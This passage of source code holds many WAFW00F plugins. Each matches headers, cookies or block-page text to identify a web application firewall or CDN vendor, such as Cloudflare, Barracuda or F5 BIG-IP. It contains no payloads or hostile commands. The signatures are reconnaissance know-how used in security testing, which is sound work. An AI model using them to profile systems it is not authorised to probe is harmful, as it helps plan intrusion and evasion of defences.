--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Yunjiasu (Baidu Cloud Computing)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'Yunjiasu(.+)?'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/barikode.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Barikode (Ethic Ninja)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<strong>barikode<.strong>'),
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/barracuda.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Barracuda (Barracuda Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^barra_counter_session='),
13 |         self.matchCookie(r'^BNI__BARRACUDA_LB_COOKIE='),
14 |         self.matchCookie(r'^BNI_persistence='),
15 |         self.matchCookie(r'^BN[IE]S_.*?='),
16 |         self.matchContent(r'Barracuda.Networks')
17 |     ]
18 |     if any(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/bekchy.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Bekchy (Faydata Technologies Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # Both signatures are contained within response, so checking for any one of them
13 |         # Sometimes I observed that there is an XHR request being being made to submit the 
14 |         # report data automatically upon page load. In those cases a missing https is causing
15 |         # false negatives.
16 |         self.matchContent(r'Bekchy.{0,10}?Access Denied'),
17 |         self.matchContent(r'bekchy\.com/report')
18 |     ]
19 |     if any(i for i in schemes):
20 |         return True
21 |     return False
22 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/beluga.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Beluga CDN (Beluga)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'Beluga')),
13 |         self.matchCookie(r'^beluga_request_trail=')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/binarysec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'BinarySec (BinarySec)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'BinarySec')),
13 |         self.matchHeader(('x-binarysec-via', '.+')),
14 |         self.matchHeader(('x-binarysec-nocache', '.+'))
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/bitninja.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'BitNinja (BitNinja)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'Security check by BitNinja'),
13 |         self.matchContent(r'Visitor anti-robot validation')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/blockdos.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'BlockDoS (BlockDoS)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'blockdos\.net'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/bluedon.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Bluedon (Bluedon IST)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # Found sample servers returning 'Server: BDWAF/2.0'
13 |         self.matchHeader(('Server', r'BDWAF')),
14 |         self.matchContent(r'bluedon web application firewall')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/bulletproof.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'BulletProof Security Pro (AITpro Security)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'\+?bpsMessage'),
13 |         self.matchContent(r'403 Forbidden Error Page'),
14 |         self.matchContent(r'If you arrived here due to a search')
15 |     ]
16 |     if all(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cachefly.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'CacheFly CDN (CacheFly)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('BestCDN', r'Cachefly')),
13 |         self.matchCookie(r'^cfly_req.*=')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cachewall.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'CacheWall (Varnish)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'Varnish')),
13 |         self.matchHeader(('X-Varnish', '.+')),
14 |         self.matchHeader(('X-Cachewall-Action', '.+?')),
15 |         self.matchHeader(('X-Cachewall-Reason', '.+?')),
16 |         self.matchContent(r'security by cachewall'),
17 |         self.matchContent(r'403 naughty.{0,10}?not nice!'),
18 |         self.matchContent(r'varnish cache server')
19 |     ]
20 |     if any(i for i in schemes):
21 |         return True
22 |     return False
23 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cdnns.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'CdnNS Application Gateway (CdnNs/WdidcNet)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'cdnnswaf application gateway')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cerber.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'WP Cerber Security (Cerber Tech)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'your request looks suspicious or similar to automated'),
13 |         self.matchContent(r'our server stopped processing your request'),
14 |         self.matchContent(r'We.re sorry.{0,10}?you are not allowed to proceed'),
15 |         self.matchContent(r'requests from spam posting software'),
16 |         self.matchContent(r'<title>403 Access Forbidden')
17 |     ]
18 |     if all(i for i in schemes):
19 |         return True
20 |     return False
21 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/chinacache.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ChinaCache Load Balancer (ChinaCache)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Powered-By-ChinaCache', '.+'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/chuangyu.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Chuang Yu Shield (Yunaq)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'www\.365cyd\.com'),
13 |         self.matchContent(r'help\.365cyd\.com/cyd\-error\-help.html\?code=403')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/ciscoacexml.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'ACE XML Gateway (Cisco)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'ACE XML Gateway'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cloudbric.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Cloudbric (Penta Security)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'<title>Cloudbric.{0,5}?ERROR!'),
13 |         self.matchContent(r'Your request was blocked by Cloudbric'),
14 |         self.matchContent(r'please contact Cloudbric Support'),
15 |         self.matchContent(r'cloudbric\.zendesk\.com'),
16 |         self.matchContent(r'Cloudbric Help Center'),
17 |         self.matchContent(
18 |             r'malformed request syntax.{0,4}?invalid request message framing.{0,4}?or deceptive request routing')
19 |     ]
20 |     if any(i for i in schemes):
21 |         return True
22 |     return False
23 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cloudflare.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Cloudflare (Cloudflare Inc.)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('server', 'cloudflare')),
13 |         self.matchHeader(('server', r'cloudflare[-_]nginx')),
14 |         self.matchHeader(('cf-ray', r'.+?')),
15 |         self.matchCookie('__cfduid')
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cloudfloordns.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Cloudfloor (Cloudfloor DNS)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'CloudfloorDNS(.WAF)?')),
13 |         self.matchContent(r'<(title|h\d{1})>CloudfloorDNS.{0,6}?Web Application Firewall Error'),
14 |         self.matchContent(r'www\.cloudfloordns\.com/contact')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/cloudfront.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Cloudfront (Amazon)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # This is standard detection schema, checking the server header
13 |         self.matchHeader(('Server', 'Cloudfront')),
14 |         # Found samples returning 'Via: 1.1 58bfg7h6fg76h8fg7jhdf2.cloudfront.net (CloudFront)'
15 |         self.matchHeader(('Via', r'([0-9\.]+?)? \w+?\.cloudfront\.net \(Cloudfront\)')),
16 |         # The request token is sent along with this header, eg:
17 |         # X-Amz-Cf-Id: sX5QSkbAzSwd-xx3RbJmxYHL3iVNNyXa1UIebDNCshQbHxCjVcWDww==
18 |         self.matchHeader(('X-Amz-Cf-Id', '.+?'), attack=True),
19 |         # This is another reliable fingerprint found on headers
20 |         self.matchHeader(('X-Cache', 'Error from Cloudfront'), attack=True),
21 |         # These fingerprints are found on the blockpage itself
22 |         self.matchContent(r'Generated by cloudfront \(CloudFront\)')
23 |     ]
24 |     if any(i for i in schemes):
25 |         return True
26 |     return False
27 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/comodo.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Comodo cWatch (Comodo CyberSecurity)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'Protected by COMODO WAF(.+)?'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/crawlprotect.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'CrawlProtect (Jean-Denis Brun)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^crawlprotecttag='),
13 |         self.matchContent(r'<title>crawlprotect'),
14 |         self.matchContent(r'this site is protected by crawlprotect')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/denyall.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'DenyALL (Rohde & Schwarz CyberSecurity)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchStatus(200),
13 |         self.matchReason('Condition Intercepted')
14 |     ]
15 |     if all(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/distil.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Distil (Distil Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'cdn\.distilnetworks\.com/images/anomaly\.detected\.png'),
13 |         self.matchContent(r'distilCaptchaForm'),
14 |         self.matchContent(r'distilCallbackGuard')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/dosarrest.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'DOSarrest (DOSarrest Internet Security)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-DIS-Request-ID', '.+')),
13 |         # Found samples of DOSArrest returning 'Server: DoSArrest/3.5'
14 |         self.matchHeader(('Server', r'DOSarrest(.*)?'))
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/dotdefender.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'DotDefender (Applicure Technologies)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-dotDefender-denied', r'.+?'), attack=True),
13 |         self.matchContent(r'dotdefender blocked your request'),
14 |         self.matchContent(r'Applicure is the leading provider of web application security')
15 |     ]
16 |     if any(i for i in schemes):
17 |         return True
18 |     return False
19 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/dynamicweb.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'DynamicWeb Injection Check (DynamicWeb)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-403-Status-By', r'dw.inj.check'), attack=True),
13 |         self.matchContent(r'by dynamic check(.{0,10}?module)?')
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/edgecast.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Edgecast (Verizon Digital Media)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'^ECD(.+)?')),
13 |         self.matchHeader(('Server', r'^ECS(.*)?'))
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/eisoo.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Eisoo Cloud Firewall (Eisoo)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'EisooWAF(\-AZURE)?/?')),
13 |         self.matchContent(r'<link.{0,10}?href=\"/eisoo\-firewall\-block\.css'),
14 |         self.matchContent(r'www\.eisoo\.com'),
15 |         self.matchContent(r'&copy; \d{4} Eisoo Inc')
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/expressionengine.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Expression Engine (EllisLab)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         # I have seen some sites use a tracking header and sets a cookie upon authentication
13 |         # 'Set-Cookie: _exp_tracking=rufyhweiuitefgcxyniercyft5-6dctuxeygfr'
14 |         self.matchCookie(r'^exp_track.+?='),
15 |         # There are traces found where cookie is returning values like:
16 |         # Set-Cookie: exp_last_query=834y8d73y94d8g983u4shn8u4shr3uh3
17 |         # Set-Cookie: exp_last_id=b342b432b1a876r8
18 |         self.matchCookie(r'^exp_last_.+?=', attack=True),
19 |         # In-page fingerprints vary a lot in different sites. Hence these are not quite reliable.
20 |         self.matchContent(r'invalid get data')
21 |     ]
22 |     if any(i for i in schemes):
23 |         return True
24 |     return False
25 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/f5bigipapm.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'BIG-IP AP Manager (F5 Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchCookie('^LastMRH_Session'),
13 |         self.matchCookie('^MRHSession')
14 |     ]
15 |     schema2 = [
16 |         self.matchCookie('^MRHSession'),
17 |         self.matchHeader(('Server', r'Big([-_])?IP'), attack=True)
18 |     ]
19 |     schema3 = [
20 |         self.matchCookie('^F5_fullWT'),
21 |         self.matchCookie('^F5_fullWT'),
22 |         self.matchCookie('^F5_HT_shrinked')
23 |     ]
24 |     if all(i for i in schema1):
25 |         return True
26 |     if all(i for i in schema2):
27 |         return True
28 |     if any(i for i in schema3):
29 |         return True
30 |     return False
31 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/f5bigipasm.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'BIG-IP AppSec Manager (F5 Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent('the requested url was rejected'),
13 |         self.matchContent('please consult with your administrator')
14 |     ]
15 |     if all(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/f5bigipltm.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'BIG-IP Local Traffic Manager (F5 Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie('^bigipserver'),
13 |         self.matchHeader(('X-Cnection', 'close'), attack=True)
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/f5firepass.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'FirePass (F5 Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchCookie('^VHOST'),
13 |         self.matchHeader(('Location', r'\/my\.logon\.php3'))
14 |     ]
15 |     schema2 = [
16 |         self.matchCookie(r'^F5_fire.+?'),
17 |         self.matchCookie('^F5_passid_shrinked')
18 |     ]
19 |     if all(i for i in schema1):
20 |         return True
21 |     if all(i for i in schema2):
22 |         return True
23 |     return False
24 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/f5trafficshield.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Trafficshield (F5 Networks)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie('^ASINFO='),
13 |         self.matchHeader(('Server', 'F5-TrafficShield'))
14 |     ]
15 |     if any(i for i in schemes):
16 |         return True
17 |     return False
18 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/fastly.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Fastly (Fastly CDN)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Fastly-Request-ID', r'\w+'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/fortiweb.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'FortiWeb (Fortinet)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schema1 = [
12 |         self.matchCookie(r'^FORTIWAFSID='),
13 |         self.matchContent('.fgd_icon')
14 |     ]
15 |     schema2 = [
16 |         self.matchContent('fgd_icon'),
17 |         self.matchContent('web.page.blocked'),
18 |         self.matchContent('url'),
19 |         self.matchContent('attack.id'),
20 |         self.matchContent('message.id'),
21 |         self.matchContent('client.ip')
22 |     ]
23 |     if any(i for i in schema1):
24 |         return True
25 |     if all(i for i in schema2):
26 |         return True
27 |     return False
28 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/frontdoor.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Azure Front Door (Microsoft)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Azure-Ref', '.+?')),
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/godaddy.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'GoDaddy Website Protection (GoDaddy)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchContent(r'GoDaddy (security|website firewall)')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/greywizard.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Greywizard (Grey Wizard)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', 'greywizard')),
13 |         self.matchContent(r'<(title|h\d{1})>Grey Wizard'),
14 |         self.matchContent(r'contact the website owner or Grey Wizard'),
15 |         self.matchContent(r'We.ve detected attempted attack or non standard traffic from your ip address')
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/huaweicloud.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Huawei Cloud Firewall (Huawei)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie(r'^HWWAFSESID='),
13 |         self.matchHeader(('Server', r'HuaweiCloudWAF')),
14 |         self.matchContent(r'hwclouds\.com'),
15 |         self.matchContent(r'hws_security@')
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/hyperguard.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'HyperGuard (Art of Defense)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchCookie('^WODSESSION=')
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/ibmdatapower.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'DataPower (IBM)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('X-Backside-Transport', r'(OK|FAIL)'))
13 |     ]
14 |     if any(i for i in schemes):
15 |         return True
16 |     return False
17 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/imunify360.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | NAME = 'Imunify360 (CloudLinux)'
 8 | 
 9 | 
10 | def is_waf(self):
11 |     schemes = [
12 |         self.matchHeader(('Server', r'imunify360.{0,10}?')),
13 |         self.matchContent(r'protected.by.{0,10}?imunify360'),
14 |         self.matchContent(r'powered.by.{0,10}?imunify360'),
15 |         self.matchContent(r'imunify360.preloader')
16 |     ]
17 |     if any(i for i in schemes):
18 |         return True
19 |     return False
20 | 


--------------------------------------------------------------------------------
/wafw00f/plugins/incapsula.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
